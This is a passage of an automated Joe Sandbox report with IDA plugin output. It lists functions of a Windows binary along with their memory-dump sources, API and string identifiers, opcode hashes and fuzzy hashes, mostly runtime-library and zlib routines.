                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                                • Part of subcall function 00007FF6FB2048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048EC
                                                                • Part of subcall function 00007FF6FB1F9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                              • String ID:
                                                              • API String ID: 2248164782-0
                                                              • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                              • Instruction ID: 84219a2c855dfa693130133d1c4c34ccd528d016bfff61c364647bc3c10870ae
                                                              • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                              • Instruction Fuzzy Hash: 7D514E32A1864386E720EF21EAA11B96760BF4C784F44A535EA6DC76F6EF3CE4408740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                              • Instruction ID: 0d44c07b34abdebbf698619f9d83ddde915a951e6aea69ede6e902a6afa5f816
                                                              • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                              • Instruction Fuzzy Hash: 9B114826B14B068AEB00DB60E9542BC33A4FB5D758F041E31DA2DC6BA4EF78E1998340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: memcpy_s
                                                              • String ID:
                                                              • API String ID: 1502251526-0
                                                              • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                              • Instruction ID: 6db5c189c9bd3171c31b18d47c2dbb82dc4d3415bba6af41397f8d29150b7951
                                                              • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                              • Instruction Fuzzy Hash: 1BC1D072A1968787E7248F19A19467AB791F78CBC4F40A135DB5AC3794EF3DE801CB40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown header flags set
                                                              • API String ID: 0-1127688429
                                                              • Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                              • Instruction ID: 17dbab419e158e4d0d0bd975f30c0bdf4cd077021e21cd1450eb229fb540ce5a
                                                              • Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                              • Instruction Fuzzy Hash: B3F16372E183D64BE7A5CB15C088A3E7AE9EF48788F055538DA5987BE0EF78E540C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise_clrfp
                                                              • String ID:
                                                              • API String ID: 15204871-0
                                                              • Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                              • Instruction ID: 18f9ad92a52d5fb2a4385b4198914d048b67fb94ec07d2bb1397b4705e6138b7
                                                              • Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                              • Instruction Fuzzy Hash: 27B16C73604B8A8AEB15CF29C5563693BA0F748B88F149921DB6DC7BB8DF39D451C700
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-227171996
                                                              • Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                              • Instruction ID: f02ae220fc6369b067e776ba1c486de961b38295c6abac39179726986b33e80e
                                                              • Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                              • Instruction Fuzzy Hash: 5FE1A272E0864782EB68DF25D15017933A1FF49B4CF244235EA6E876F5EF29E852C780
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: incorrect header check$invalid window size
                                                              • API String ID: 0-900081337
                                                              • Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                              • Instruction ID: 2051bcc12ddfff9dbbd10e09f1779bd2168d46051221a11e1b214258d0db1d5c
                                                              • Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                              • Instruction Fuzzy Hash: 55917872E182C747E7A5CB14C498A7E3AA9FB48398F154139DA5A87AE0DF38F540CB40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: e+000$gfff
                                                              • API String ID: 0-3030954782
                                                              • Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                              • Instruction ID: acd560cdc6500519427239546a256bc55ac16679b818491ebc65e18340f68233
                                                              • Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                              • Instruction Fuzzy Hash: 7C515862F186CA46E725CE36D8017796B91E748B98F489271CBA8CBAE5EE3DD440C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                              • String ID:
                                                              • API String ID: 1010374628-0
                                                              • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                              • Instruction ID: 2405bd21913fa81db3aaa9e3a43c0f2d012c5086333d96a0a89a0798a1a5338f
                                                              • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                              • Instruction Fuzzy Hash: 2302AA22E1A68740FB65EB21A95127A2680AF4DBE8F455635DE7DC63F6FE7CE401C300
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfffffff
                                                              • API String ID: 0-1523873471
                                                              • Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                              • Instruction ID: 54cf5c3344d337efd30be837b24edea48b0b307a8ff19b45c06680a693bc7a66
                                                              • Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                              • Instruction Fuzzy Hash: CCA14862F0878B46EB21CB29A4007BDBB91AB58B88F058131DE5D87BE5EE3DD501D701
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: TMP
                                                              • API String ID: 3215553584-3125297090
                                                              • Opcode ID: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                              • Instruction ID: 6c2b5e47e3301e2e8c6d82412497d977f7e7316235823c3f668eea3fb8b6d495
                                                              • Opcode Fuzzy Hash: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                              • Instruction Fuzzy Hash: 83519F29F0C64741FB68EB2699115BA5291AF89BC8F485434DE2DC77F6FE3CE45AC200
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                              • Instruction ID: c7d22a6ecfbf1e6972acf08a481a0f94ce611f6682f82235475f626c276dc700
                                                              • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                              • Instruction Fuzzy Hash: A2B09224E17A87C2EB082B116DAA22822A47F8C710FA48138C41DC13B0EE2C20A54700
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                              • Instruction ID: 43c103093313f571fd5e689831b39a2bacd17e70a5aa2107c639e6027088a4d4
                                                              • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                              • Instruction Fuzzy Hash: 09D1B332E0865786EB78EE25855027D27A0FB49B8CF145235EE2D876E5EF3DE841C780
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                              • Instruction ID: bb6318eade59400a03c3f57b4cd4f9b0c83cb2ee7bed656787fec3c0f966d440
                                                              • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                              • Instruction Fuzzy Hash: EFC1AE726142F24FD289EB29E4695BA73E1F79830DBD4402AEB8747FC5CA3CA414D790
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                              • Instruction ID: 3347d0aac9943767dd3f499272287ebc2bb2a1c446a27ab3f70d0b640e606901
                                                              • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                              • Instruction Fuzzy Hash: C4B16A72A08B8685E765DF29C05423C3BA0E749B4CF280135EB6E873E5EF39D851C795
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                              • Instruction ID: 9234e63d3a26116fd54151b0599d280e5f74aec7cf036e69418c83459bd626e6
                                                              • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                              • Instruction Fuzzy Hash: BF81A272F0C68646E774CF29944037A6691FB8A7D8F144235DAAD83BE9EE3DD540CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
                                                              • Instruction ID: a0cb36abf8b3366352c43b7ef4a9e7cff368397812cce18889cbec9463478555
                                                              • Opcode Fuzzy Hash: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
                                                              • Instruction Fuzzy Hash: B461F522E0C28746FB64CA2885A463D7681AF497F0F145A39DA7DC6AF1FE7DE840C700
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction ID: 7f92172d1c9833e09b4247c4b61100c3547be7627dd171daa59a45069b000f64
                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction Fuzzy Hash: 60514176E18A5286E724CF29C04823927A1EB59B6CF244131CE6DD77E5EF3AE853C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction ID: 396fd18c00bfea675f526f2136b9d4a47aa9c99689b6cf636bcfa70b86f54d10
                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction Fuzzy Hash: 94515176E1865386F724CB29C04422837A0EB5AB6CF284135DA5D977F4EF7AE862C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
